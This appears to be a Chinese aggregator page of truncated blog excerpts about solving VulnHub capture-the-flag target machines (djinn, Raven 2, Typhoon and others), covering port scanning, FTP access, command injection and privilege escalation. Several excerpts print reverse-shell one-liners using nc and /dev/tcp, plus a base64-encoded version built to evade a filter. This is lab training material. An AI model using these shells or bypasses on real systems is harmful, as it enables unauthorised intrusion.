djinn靶机】的更多相关文章

仅供个人娱乐 靶机信息 https://download.vulnhub.com/djinn/djinn.ova 一.主机探测 二.漏洞的查找和利用 21端口ftp 匿名登录 7331端口 命令执行  反弹窗口 nc -e /bin/bash 192.168.174.129 4444 尝试绕过 bash -i >& /dev/tcp/192.168.174.129/4444 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjk…
djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录.根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299…
靶机下载链接: https://download.vulnhub.com/djinn/djinn.ova 主机端口扫描: FTP发现一些文件提示 1337端口是一个游戏,去看下 哈哈有点难,暂时放弃,看看7331HTTP server 这边有么有发现 使用dirb dirsearch 自带字典没有发现,加大字段枚举下目录 命令执行 反弹shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直弹不出来,猜测特殊字符做了过滤 base6…
这道题挺难的,和Djinn:1相比,正如作者所言,有许多相似的地方.仍然开放着端口 可以看到5个端口开放着,1337是web端口,这里面如djinn1一样,write your wish,但是send to god. 所以在7331端口下进行dirb:如下结果: 知道这些信息当然是下载source了,下载后文件如下(只粘贴关键部分) 作者告诉我这个请求是关键,说这里可以顺利的利用RCE,刚开始的我傻傻的还以为是改脚本运行连接服务器呢,可是尝试了很久都无法连接.有位大神给了我些许的灵感,就开始了R…
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”,无论什么形式,这些都需要我们对于服务器的防护工作有所了解.对于线下赛,笔者虽说没有什么很高超的攻防技巧,但也是有着一些自己的心得.本文总结了一些CTF线下赛中常用的服务器加固姿势,希望能对各位CTF朋友们有所帮助.环境针对目前常见线下赛常见的linux Web服务器,但是因为CTF…
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方,一步,一步写清楚,文章如果看不懂?那写出来的意义何在? ngrok与sunny都是匿名的好东西,此次攻击全程在kali下面完成,无需公网,并且使用的代理转发,都是一次性,So?下面开始 准备工作 1.Kali一台 2.ngrok账户注册:https://dashboard.ngrok.com/us…
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算机处于同一个网段中,可以相互通讯,Kali系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁. 如图1,kali的IP为:192.168.19.128 如图2:靶机的IP:…
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/126855490_472906 xss靶机的攻击过程请参考 https://pentesterlab.com/exercises/xss_and_mysql_file/course 在192.168.179.129机器上打开网页: 是个博客系统. 每个博客标题下面可以评价: 测试下是否存在xss漏洞.…
一.信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018:~# nmap -A  192.168.1.13 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 01:18 EST Nmap scan report for 192.168.1.13 Host is up (0.0014s latenc…
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的下载地址: https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download(注意确认下载镜像中MERCY.mf的sha256值是否正确) 0x02 信息收集 1.存活主机扫描 root@kali2018…
  0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA 0x02 信息收集 1.存活主机扫描 root@kali2018:/# arp-scan -l 发现192.168.1.10是目标靶机系统 2.端口扫描 namp扫描目标…
  0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.9是目标靶机系统 2.端口探测 使用Nmap对靶机进行扫描 nmap -A 192.168.1.9 查询到开…
  0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS攻击. Typhoon-v1.02镜像下载地址: https://download.vulnhub.com/typhoon/Typhoon-v1.02.ova.torrent 0x02 信息收集 1.存活主机扫描 arp-scan  -l 发现192.168.1.104就是目标靶机系统 2.端口探测…
0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(192.168.1.0/24)进行扫描发现192.168.1.12就是目标靶机,并开放了80,22,111端…
使用Nmap攻击靶机和使用Wireshark进行嗅探.分析 在上一次课中已经对Nmap的使用.原理已经做了很多学习,这次的课更多地针对Wireshark进行学习和使用. 使用192.168.200.136使用ping命令扫描192.168.200.133是否在线. 根据Wireshark所截获的报文来看: 首先广播查找192.168.200.133ip所对应的MAC地址,告诉192.168.200.136ip.使用的是ARP(地址解析)协议. 之后136ip要查看和136ip之间的网络延迟是多少…
在一个笔记本上开两个虚拟机有点卡,而且太麻烦,就把metasploit的目标靶机放在别的机器上了,ip自己配置了一下, 目标主机:192.168.137.254 入侵机:192.168.137.253 目标机上存在漏洞:KingView 6.53版本CVE-2011-0406漏洞,系统 win2003 SP0 下面进入正题:   在信息搜集中得知,目标主机开放了777端口,百度发现,这个端口运行着KingView的服务,并且存在着漏洞. 直接在msf在search这个漏洞的利用模块...没有啊…
打开装载Metasploitable2虚拟机的靶机,并获取靶机ip: 使用nmap+ip初步扫描靶机 PORT为端口,STATE为端口开放状态,SERVICE为端口的提供的服务.靶机的MAC地址为: 00:0C:29:CC:AC:08 -vv进行详细输出 nmap -p(range) 指定端口扫描 namp -O 扫描靶机操作系统类型 路由跟踪,先用ping获得目标域名(www.zhihu.com)的ip地址,然后使用nmap --traceroute 112.29.152.100…
kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提取码:q6zo 一.主机发现(nmap/netdiscover) netdiscover -i eth0 -r 192.168.10.0/24 nmap 192.168.10.0/24 -sn 二.端口扫描(masscan/nmap) 根据上面主机发现得到的主机,然后依次对每个主机进行快速端口扫描,…
这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymql 的UDF提权. 扫描网站目录发现,还是wordpress搭建的,尝试使用wpscan对靶机进行扫描: 得到用户. 翻看爆破出来的目录,发现 http://192.168.0.141/vendor 存在任意文件遍历 并且在 PATH 目录下隐藏了一个flag,还得知整个网站搭建在 /var/www…
靶机链接 https://www.vulnhub.com/entry/the-ether-evilscience,212 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行vmx文件即可 靶机:本靶机默认使用了自动获取的上网模式.运行靶机之后,将会桥接到物理网卡,接入网络. 攻击机:Kali虚拟机运行于virtualbox,同样使用桥接模式,即可访问靶机. 靶机说明 本靶机有一定难度,不适合初学者. 本靶机的渗透目标为渗透进靶机并且找到系统中隐藏的Flag值. 官方提供…
靶机说明: VM Name: JIS-CTF : VulnUpload Difficulty: Beginner Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. Only working with VirtualBox 需要找到5个flag,并且靶机只能导入到VirtualBox中,才能被探测到 目标探测: 本次…
靶机说明: Game of Thrones Hacking CTF This is a challenge-game to measure your hacking skills. Set in Game of Thrones fantasy world. Goal: Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.…
靶机说明: I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP. This is a boot-to-root machine will not require any guest i…
靶机说明: Wellcome to "PwnLab: init", my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read de flag. Can contact me at: claor@pwnlab.net or on Twitter: @C…
靶机说明: 靶机主题来自美剧<黑客军团> 本次靶机有三个flag,难度在初级到中级,非常适合新手训练学习,不需要逆向技术,目标就是找到三个key,并且拿到主机root权限. 渗透过程: 本次靶机已经导入VM,采用的是桥接模式, 攻击机用的是parrot linux+windows10,攻击机IP为:192.168.0.104 由于在同一网段内,我们用nmap找出靶机IP地址:nmap -sP 192.168.0.0/24 得到靶机IP地址为:192.168.0.107 我们用nmap对靶机IP…
靶机描述: SkyDog Con CTF 2016 - Catch Me If You Can 难度:初学者/中级 说明:CTF是虚拟机,在虚拟箱中工作效果最好.下载OVA文件打开虚拟框,然后选择文件->导入设备.从下载的地方选择OVA文件.在导入OVA文件之后,确保在启动VM之前禁用USB 2.默认情况下,只为主机设置适配器,但在启动之前,您可以根据网络设置改变这一点.虚拟机服务器配置为DHCP.如果你有任何问题,请在Twitter上告诉我JAMSBOWER,我很乐意帮忙. Flags The…
靶机描述:欢迎来到超级马里奥主机!这个虚拟机是对真实世界场景场景的模拟.目标是在VM中找到2个标志.根是不够的(对不起!)VM可以以多种方式开发,但请记住枚举是关键.挑战的程度是中等的.感谢VDBAN.KLTWD.MRB3N和GKNSB进行测试. 靶机渗透: 本次攻击机依然采取的是kali+windows,kali跟靶机都采用的是桥接模式, 攻击机IP为:192.168.0.106 我们用nmap扫出靶机ip地址: nmap -sP 192.168.0.0/24 我们探测出靶机IP为:192.1…
Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target. This workshop will provide you with a custom-made VM where the goal is to obtain root level access on…
VM Name: BlackMarket VM Description: BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th Session) which is focused on students and other InfoSec Professional. This VM has total 6 flag and one r00t flag. Each Flag leads to another Flag and fla…
靶机说明 NinevehV0.3.7z是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.0.150) 目标 Boot to root:获得root权限,查看flag. 运行环境 靶机:静态IP是192.168.0.150. 攻击机:同网段下有kali攻击机(物理机),IP地址:192.168.0.128,安装有Nmap.Burpsuit.Wireshark.Sqlmap.nc.Python2.7.JDK.DirBuster.AWVS.Nessu…